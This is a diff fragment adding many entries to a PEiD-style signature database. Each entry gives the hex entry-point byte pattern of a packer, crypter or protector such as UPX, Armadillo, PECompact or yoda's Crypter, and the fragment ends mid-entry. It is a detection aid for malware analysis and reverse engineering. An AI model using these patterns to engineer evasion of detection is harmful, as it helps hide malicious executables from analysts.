+signature=E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90
+ep_only = true
+
+[Thinstall v2.403 ->Jitit ]
+signature=6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 57 BF 00 00 80 00 39 79 14 77 36 53 56 8B B1 29 04 00 00 8B 41 0C 8B 59 10 03 DB 8A 14 30 83 E2 01 0B D3 C1 E2 07 40 89 51 10 89 41 0C 0F B6 04 30 C1 61 14 08 D1 E8 09 41 10 39
+ep_only = true
+
+[PECompact 2.x (beta version) ->Jeremy Collake]
+signature=B8 ?? ?? ?? 00 80 00 28 40
+ep_only = true
+
+[PECompact 2.0x Heuristic Mode -> Jeremy Collake]
+signature=B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = true
+
+[PECompact 2.0x Heuristic Mode -> Jeremy Collake]
+signature=B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = true
+
+[Armadillo 3.00a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD 26 42
+ep_only = true
+
+[Armadillo 3.00a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD 26 42
+ep_only = true
+
+[Armadillo 3.01 - 3.50a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD B8 43
+ep_only = true
+
+[Armadillo 3.6x -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD AB 76
+ep_only = true
+
+[Armadillo 3.7x -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 B8 3B 01 00 00 03 C5 33 DB 81 C3 01 01 01 01 31 18 81 38 78 54 00 00 74 04 31 18 EB EC
+ep_only = true
+
+[Soft Defender v1.1x -> Randy Li]
+signature = 74 07 75 05 ?? ?? ?? ?? ?? 74 1F 75 1D ?? 68 ?? ?? ?? 00 59 9C 50 74 0A 75 08 ?? 59 C2 04 00 ?? ?? ?? E8 F4 FF FF FF ?? ?? ?? 78 0F 79 0D
+ep_only = true
+
+[EXE Stealth v2.74 -> WebToolMaster]
+signature = EB 00 EB 17 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 90 E8 00 00 00 00 5D
+ep_only = true
+
+[AHTeam EP Protector v0.3 -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0
+ep_only = true
+
+[PECompact v2.0 beta -> Jeremy Collake]
+signature = B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC 90 90 90 90
+ep_only = true
+
+[PKLITE32 1.1 -> PKWARE Inc.]
+signature = 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 00 00 00 00 E8 ?? ?? ?? ?? E9
+ep_only = true
+
+[tElock 1.0 (private) -> tE!]
+signature = E9 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32
+ep_only = true
+
+[Mew 10 exe-coder 1.0  -> Northfox [HCC]]
+signature = 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70
+ep_only = true
+
+[FSG v2.0 -> bart/xt]
+signature = 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13
+ep_only = true
+
+[PeCompact v2.08->Bitsum Technologies(signature by loveboom)]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D
+ep_only=true
+
+[MEW 11 SE v1.1  -> Northfox [HCC]]
+signature = E9 ?? ?? ?? FF 0C ?0
+ep_only = true
+
+[yoda's Protector 1.0x-->Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Crypter 1.3-->Ashkbiz Danehkar]
+signature = 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00
+ep_only = true
+
+[UPX v1.03 - v1.04]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC
+ep_only = true
+
+[UPX v0.89.6 - v1.02 / v1.05 -v1.22 (Delphi) stub]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B
+ep_only = true
+
+[UPX v0.81 - v0.84 Modified]
+signature = 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF
+ep_only = true
+
+[UPX v0.89.6 - v1.02 / v1.05 - v1.22 Modified]
+signature = 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75
+ep_only = true
+
+[UPX v1.03 - v1.04 Modified]
+signature = 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF
+ep_only = true
+
+[UPX Alternative stub]
+signature = 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B
+ep_only = true
+
+[UPX Modifier v0.1x]
+signature = 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD
+ep_only = true
+
+[UPX Modified stub]
+signature = 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF
+ep_only = true
+
+[UPX Protector v1.0x]
+signature = EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX + ECLiPSE layer]
+signature = B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01
+ep_only = true
+
+[UPX-Scrambler RC v1.x]
+signature = 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF
+ep_only = true
+
+[UPXShit 0.06]
+signature = B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF
+ep_only = true
+
+[VBOX v4.2 MTE]
+signature = 8C E0 0B C5 8C E0 0B C4 03 C5 74 00 74 00 8B C5
+ep_only = true
+
+[VBOX v4.3 MTE]
+signature = 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0
+ep_only = true
+
+[VOB ProtectCD 5]
+signature = 36 3E 26 8A C0 60 E8
+ep_only = true
+
+[VOB ProtectCD]
+signature = 5F 81 EF ?? ?? ?? ?? BE ?? ?? 40 ?? 8B 87 ?? ?? ?? ?? 03 C6 57 56 8C A7 ?? ?? ?? ?? FF 10 89 87 ?? ?? ?? ?? 5E 5F
+ep_only = true
+
+[Virogen Crypt v0.75]
+signature = 9C 55 E8 EC 00 00 00 87 D5 5D 60 87 D5 80 BD 15 27 40 00 01
+ep_only = true
+
+[Winkript v1.0]
+signature = 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58
+ep_only = true
+
+[WinZip 32-bit SFX v6.x module]
+signature = FF 15 ?? ?? ?? 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 38 08 74 06 40 80 38 00 75 F6 80 38 00 74 01 40 33 C9 ?? ?? ?? ?? FF 15
+ep_only = true
+
+[WinZip 32-bit SFX v8.x module]
+signature = 53 FF 15 ?? ?? ?? 00 B3 22 38 18 74 03 80 C3 FE 8A 48 01 40 33 D2 3A CA 74 0A 3A CB 74 06 8A 48 01 40 EB F2 38 10 74 01 40 ?? ?? ?? ?? FF 15
+ep_only = true
+
+[WinRAR 32-bit SFX Module]
+signature = E9 ?? ?? 00 00 00 00 00 00 90 90 90 ?? ?? ?? ?? ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? FF
+ep_only = true
+
+[Wise Installer Stub]
+signature = 55 8B EC 81 EC ?? 04 00 00 53 56 57 6A ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? 40 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 74
+ep_only = true
+
+[Wise Installer Stub]
+signature = 55 8B EC 81 EC 78 05 00 00 53 56 BE 04 01 00 00 57 8D 85 94 FD FF FF 56 33 DB 50 53 FF 15 34 20 40 00 8D 85 94 FD FF FF 56 50 8D 85 94 FD FF FF 50 FF 15 30 20 40 00 8B 3D 2C 20 40 00 53 53 6A 03 53 6A 01 8D 85 94 FD FF FF 68 00 00 00 80 50 FF D7 83 F8 FF 89 45 FC 0F 84 7B 01 00 00 8D 85 90 FC FF FF 50 56 FF 15 28 20 40 00 8D 85 98 FE FF FF 50 53 8D 85 90 FC FF FF 68 10 30 40 00 50 FF 15 24 20 40 00 53 68 80 00 00 00 6A 02 53 53 8D 85 98 FE FF FF 68 00 00 00 40 50 FF D7 83 F8 FF 89 45 F4 0F 84 2F 01 00 00 53 53 53 6A 02 53 FF 75 FC FF 15 00 20 40 00 53 53 53 6A 04 50 89 45 F8 FF 15 1C 20 40 00 8B F8 C7 45 FC 01 00 00 00 8D 47 01 8B 08 81 F9 4D 5A 9A 00 74 08 81 F9 4D 5A 90 00 75 06 80 78 04 03 74 0D FF 45 FC 40 81 7D FC 00 80 00 00 7C DB 8D 4D F0 53 51 68
+ep_only = true
+
+[Wise Installer Stub v1.10.1029.1]
+signature = 55 8B EC 81 EC 40 0F 00 00 53 56 57 6A 04 FF 15 F4 30 40 00 FF 15 74 30 40 00 8A 08 89 45 E8 80 F9 22 75 48 8A 48 01 40 89 45 E8 33 F6 84 C9 74 0E 80 F9 22 74 09 8A 48 01 40 89 45 E8 EB EE 80 38 22 75 04 40 89 45 E8 80 38 20 75 09 40 80 38 20 74 FA 89 45 E8 8A 08 80 F9 2F 74 2B 84 C9 74 1F 80 F9 3D 74 1A 8A 48 01 40 EB F1 33 F6 84 C9 74 D6 80 F9 20 74
+ep_only = true
+
+[WWPack32 v1.00, v1.11, v1.12, v1.20]
+signature = 53 55 8B E8 33 DB EB 60 0D 0A 0D 0A 57 57 50 61 63 6B 33 32
+ep_only = true
+
+[WWPack32 v1.x]
+signature = 53 55 8B E8 33 DB EB 60
+ep_only = true
+
+[X-PEOR v0.99b]
+signature = E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00
+ep_only = true
+
+[Xtreme-Protector v1.05]
+signature = E9 ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Xtreme-Protector v1.06]
+signature = B8 ?? ?? ?? 00 B9 75 ?? ?? 00 50 51 E8 05 00 00 00 E9 4A 01 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 8A 06 46 88 07 47 BB 02 00 00 00 02 D2 75 05 8A 16 46 12 D2 73 EA 02 D2 75 05 8A 16 46 12 D2 73 4F 33 C0 02 D2 75 05 8A 16 46 12 D2 0F 83 DF 00 00 00 02 D2 75 05 8A 16 46 12 D2 13 C0 02 D2 75 05 8A 16 46 12 D2 13 C0 02 D2 75 05 8A 16 46 12 D2 13 C0 02 D2 75 05 8A 16 46 12 D2 13 C0 74 06 57 2B F8 8A 07 5F 88 07 47 BB 02 00 00 00 EB 9B B8 01 00 00 00 02 D2 75 05 8A 16 46 12 D2 13 C0 02 D2 75 05 8A 16 46 12 D2 72 EA 2B C3 BB 01 00 00 00 75 28 B9 01 00 00 00 02 D2 75 05 8A 16 46 12 D2 13 C9 02 D2 75 05 8A 16 46 12 D2 72 EA 56 8B F7 2B F5 F3 A4 5E E9 4F FF FF FF 48 C1 E0 08 8A 06 46 8B E8 B9 01 00 00 00 02 D2 75 05 8A 16 46 12 D2 13 C9 02 D2 75 05 8A 16 46 12 D2 72 EA 3D 00 7D 00 00 73 1A 3D 00 05 00 00 72 0E 41 56 8B F7 2B F0 F3 A4 5E E9 0F FF FF FF 83 F8 7F 77 03 83 C1 02 56 8B F7 2B F0 F3 A4 5E E9 FA FE FF FF 8A 06 46 33 C9 C0 E8 01 74 17 83 D1 02 8B E8 56 8B F7 2B F0 F3 A4 5E BB 01 00 00 00 E9 D9 FE FF FF 2B 7C 24 28 89 7C 24 1C 61 C2 08 00 E9 ?? ?? ?? 00 E9 38 ?? ?? ?? 01
+ep_only = true
+
+[XCR v0.11]
+signature = 60 8B F0 33 DB 83 C3 01 83 C0 01
+ep_only = true
+
+[XCR v0.12]
+signature = 60 9C E8 ?? ?? ?? ?? 8B DD 5D 81 ED ?? ?? ?? ?? 89 9D
+ep_only = true
+
+[XCR v0.13]
+signature = 93 71 08 ?? ?? ?? ?? ?? ?? ?? ?? 8B D8 78 E2 ?? ?? ?? ?? 9C 33 C3 ?? ?? ?? ?? 60 79 CE ?? ?? ?? ?? E8 01 ?? ?? ?? ?? 83 C4 04 E8 AB FF FF FF ?? ?? ?? ?? 2B E8 ?? ?? ?? ?? 03 C5 FF 30 ?? ?? ?? ?? C6 ?? EB
+ep_only = true
+
+[X-PEOR v0.99b]
+signature = E8 ?? ?? ?? ?? 5D 8B CD 81 ED 7A 29 40 ?? 89 AD 0F 6D 40
+ep_only = true
+
+[y0da's Crypter v1.0]
+signature = 60 E8 00 00 00 00 5D 81 ED E7 1A 40 00 E8 A1 00 00 00 E8 D1 00 00 00 E8 85 01 00 00 F7 85
+ep_only = true
+
+[y0da's Crypter v1.1]
+signature = 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33
+ep_only = true
+
+[y0da's Crypter v1.2]
+signature = 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC
+ep_only = true
+
+[y0da's Crypter v1.x / Modified]
+signature = 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? B9 ?? ?? 00 00 8D BD ?? ?? ?? ?? 8B F7 AC
+ep_only = true
+
+[ZCode Win32/PE Protector v1.01]
+signature = E9 12 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E9 FB FF FF FF C3 68 ?? ?? ?? ?? 64 FF 35
+ep_only = true
+
+[*** Protector v1.1.11 (DDeM->PE Engine v0.9, DDeM->CI v0.9.2)]
+signature = 53 51 56 E8 00 00 00 00 5B 81 EB 08 10 00 00 8D B3 34 10 00 00 B9 F3 03 00 00 BA 63 17 2A EE 31 16 83 C6 04
+
+[Mew 10 v1.0 (Eng) -> Northfox]
+signature = 33 C0 E9 ?? ?? ?? FF
+ep_only = true
+
+[AHTeam EP Protector v0.3 -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0
+ep_only = true
+
+[PECompact v2.0]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00
+ep_only = true
+[Exe Stealth 2.75a -> WebtoolMaster]
+signature = EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC
+ep_only = True
+
+[AHTeam EP Protector v0.3 -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0
+ep_only = true
+
+[PeCompact v2.08 ->Bitsum Technologies]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D
+ep_only=true
+
+[Armadillo 3.01 - 3.50a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 